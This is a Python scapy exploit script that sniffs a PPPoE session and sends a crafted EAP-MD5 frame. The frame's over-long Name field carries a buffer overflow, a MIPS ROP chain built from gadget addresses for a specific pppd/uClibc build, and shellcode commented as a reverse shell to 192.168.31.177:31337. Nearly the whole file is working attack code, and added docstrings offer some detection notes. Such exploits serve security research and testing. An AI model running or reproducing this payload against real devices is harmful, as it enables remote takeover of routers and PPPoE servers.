- from scapy.all import *
- from socket import *
# Name of the NIC used for both the PPPoE sniff and the transmit below.
# Host-specific; the author's value is kept as-is.
interface = "enp0s31f6"
# PPPoE session id. packet_callback overwrites it with the value taken from
# the first sniffed PPPoES frame; eap_response_md5 reads it when it builds
# its frame.
sessionid = 0
def mysend(pay, interface=interface):
    """Inject the frame *pay* on *interface* with scapy's layer-2 sendp().

    The default for *interface* is bound to the module-level ``interface``
    at definition time, so later changes to that global are not picked up.
    """
    nic = interface
    sendp(pay, iface=nic)
def packet_callback(packet):
    """Record the PPPoE session id of a sniffed PPPoES frame.

    The id is stored in the module-level ``sessionid`` (read later by
    eap_response_md5) and echoed to stdout.
    """
    global sessionid
    pppoe_layer = packet['PPP over Ethernet']
    sessionid = int(pppoe_layer.sessionid)
    print("sessionid:{}".format(sessionid))
def eap_response_md5():
    """
    Build one PPPoE-Session / PPP / EAP-MD5 frame and hand it to mysend().

    The EAP-MD5 optional_name field does not carry a peer name: it is
    0x17C bytes of filler followed by a run of 4-byte values and a
    stage-3 payload (rop_chain below), so the field is far longer than any
    legitimate EAP-MD5 Name.  Reads the module-level sessionid that
    packet_callback filled in.

    Defender notes:
      * Detection: an EAP-MD5 Response whose Name field runs to several
        hundred bytes, or consists mostly of one repeated byte (0x41 here),
        is a strong anomaly on a PPPoE access concentrator.  A robust EAP
        receiver bounds the Name length against its destination buffer
        before copying it.
      * The 4-byte constants below are addresses from one specific pppd /
        uClibc build (see the inline offsets and the libuclibc base noted
        below); they carry no meaning for any other build.

    Reference frame captured by the author (Wireshark dissection):
    Ethernet II, Src: Vmware_b9:de:6c (00:0c:29:b9:de:6c), Dst: Vmware_83:48:19 (00:0c:29:83:48:19) Type: PPPoE Session (0x8864)
    PPPoes : Version(4bits) + type(4bits) + code + session ID + payload length
    PPP : Extensible Authentication Protocol (0xc227)
    EAP :
    Code: Request (1)
    Id: 131
    Length: 344
    Type: MD5-Challenge EAP (EAP-MD5-CHALLENGE) (4)
    EAP-MD5 Value-Size: 18
    EAP-MD5 Value: ef0a5c972ecfaeb3307310e99d81f9b0decf
    EAP-MD5 Extra Data: 414141414141414141414141414141414141414141414141...
    pay = "\x00\x0c\x29\x83\x48\x19" \
    "\x00\x0c\x29\xb9\xde\x6c" \
    "\x88\x64\x11\x00" \
    "\x00" + chr(sessionid) + "\x01\x5a\xc2\x27\x01\x83\x01\x58\x04\x12\xef\x0a\x5c\x97" \
    "\x2e\xcf\xae\xb3\x30\x73\x10\xe9\x9d\x81\xf9\xb0\xde\xcf\x41\x41" \
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + 'a'*0x100
    """
    #libuclibc base: 77eaa000
    # Zeroed source/destination MACs; the Ethernet header is emitted as Raw
    # bytes at the end of this function rather than as an Ether() layer.
    src = b"\x00\x00\x00\x00\x00\x00"
    dst = b"\x00\x00\x00\x00\x00\x00"
    ethertype = b"\x88\x64"  # PPPoE Session stage
    # 16-byte EAP-MD5 Value field: an incrementing 0x01..0x10 pattern, not a
    # computed digest.
    md5 = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10"
    local_28 = b'\x84\x57\x44\x00'
    # Loaded from 0x42590c
    s0 = b"\x4c\x4a\xEC\x77" # uclibc 0x0001aa4c : subu $sp, $sp, $v0 ; addiu $s3, $sp, 0x18 ; move $a0, $s3 ; move $a1, $s6 ; move $t9, $s1 ; jalr $t9 ; move $a2, $s7
    s1 = b"\x84\x7D\xEB\x77" # uclibc 0x0000dd84 : move $t9, $s4 ; lbu $s6, -1($v0) ; jalr $t9 ; move $a0, $s2 ; addiu $a2, $v0, 1 ; addiu $a0, $s0, 0xb ; move $t9, $s3 ; jalr $t9 ; move $a1, $s2
    s2 = b"\xC0\x04\x00\x00" # 0x4C0 How far we are rewinding the stack pointer
    s3 = b"\x01\x00\x00\x00" # !0
    s4 = b"\x0c\x93\x40\x00" # 0x0040930c lw $s5, 0x3c($sp) ; lw $s4, 0x38($sp) ; lw $s3, 0x34($sp) ; lw $s2, 0x30($sp) ; lw $s1, 0x2c($sp) ; lw $s0, 0x28($sp) ; jr $ra ; addiu $sp, $sp, 0x48
    s5 = b"\x00\x00\x00\x00"
    ra = b"\x0c\x2d\x41\x00" # 0x00412d0c : move $v0, $s2 ; beqz $s3, 0x412d4c ; addiu $s6, $s6, 1 ; lbu $a2, -1($s6) ; move $a0, $s1 ; move $t9, $s0 ; jalr $t9 ; move $a1, $s4
    new_s0 = b"\x01\x00\x00\x00" # 1 (loaded in to $a0, then +0xb later)
    new_s1 = b"\x00\x00\x00\x00"
    new_s2 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    new_s3 = b"\xA8\x85\xEF\x77" # 77EF85A8 libuClibc.txt:0x0004e5a8 : lw $ra, 0x24($sp) ; lw $s1, 0x1c($sp) ; lw $s0, 0x18($sp) ; move $t9, $s2 ; lw $s2, 0x20($sp) ; jr $t9 ; addiu $sp, $sp, 0x28
    new_s4 = b"\x00\x00\x00\x00"
    new_s5 = b"\x00\x00\x00\x00"
    c6_s0 = b"\x74\xd8\x40\x00" # pppd.txt:0x0040d874 : move $t9, $s1 ; jalr $t9 ; nop
    c6_s1 = b"\x00\x00\x00\x00"
    c6_s2 = b"\x00\x00\x00\x00"
    c6_ra = b"\x90\x37\xEC\x77" # libuClibc.txt:0x00019790 : addiu $s1, $sp, 0x10 ; move $a0, $s1 ; move $t9, $s0 ; jalr $t9 ; move $a1, $s4
    # Reverse shell, connect to 192.168.31.177:31337
    stg3_SC = b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    stg3_SC += b"\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    stg3_SC += b"\xf8\xff\xa5\xaf\x1f\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    stg3_SC += b"\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    stg3_SC += b"\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    stg3_SC += b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    stg3_SC += b"\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    stg3_SC += b"\xab\x0f\x02\x24\x0c\x09\x09\x01"
    #Debug sleep
    #s0 = b"\x00\x00\x00\x00"
    #s1 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    #s2 = b"\x03\x00\x00\x00"
    #s3 = b"\x01\x00\x00\x00"
    #s4 = b"\x0c\x93\x40\x00"
    #s5 = b"\x00\x00\x00\x00"
    #ra = b"\x04\xdb\x40\x00" # 0x0040db04 : move $a0, $s2 ; move $t9, $s1 ; jalr $t9
    # Assemble the over-length Name field from the pieces above.
    rop_chain = (b'A' * 0x17C)
    rop_chain += local_28
    rop_chain += (b'A' * 0x4)
    rop_chain += s0
    rop_chain += s1
    rop_chain += s2
    rop_chain += s3
    rop_chain += s4
    rop_chain += s5
    rop_chain += ra
    #Only rewound the sp by 4C0, so there's 0x100 left
    rop_chain += (b'A' * 0x100)
    rop_chain += (b'A' * 0x28)
    rop_chain += new_s0
    rop_chain += new_s1
    rop_chain += new_s2
    rop_chain += new_s3
    rop_chain += new_s4
    rop_chain += new_s5
    rop_chain += (b'A' * 0x8)
    rop_chain += (b'A' * 0x18)
    rop_chain += c6_s0
    rop_chain += c6_s1
    rop_chain += c6_s2
    rop_chain += c6_ra
    rop_chain += (b'A' * 0x10)
    rop_chain += stg3_SC
    #Just padding the end a little, since the last byte gets set to 0x00?
    rop_chain += (b'A' * 0x8)
    # Ethernet header as Raw bytes (zeroed MACs), PPPoE code 0x00 (session
    # data) with the sniffed session id, PPP protocol 0xc227 (EAP), then the
    # EAP-MD5 layer whose optional_name carries the over-length field.
    pay = Raw(dst + src + ethertype)/PPPoE(code=0x00,sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100,value=md5,optional_name=rop_chain)
    mysend(pay)
if __name__ == '__main__':
    # Block until exactly one PPPoE-Session frame is seen on `interface`
    # (packet_callback records its session id), then build and send the
    # EAP-MD5 frame.
    sniff(prn=packet_callback,iface=interface,filter="pppoes",count=1)
    eap_response_md5()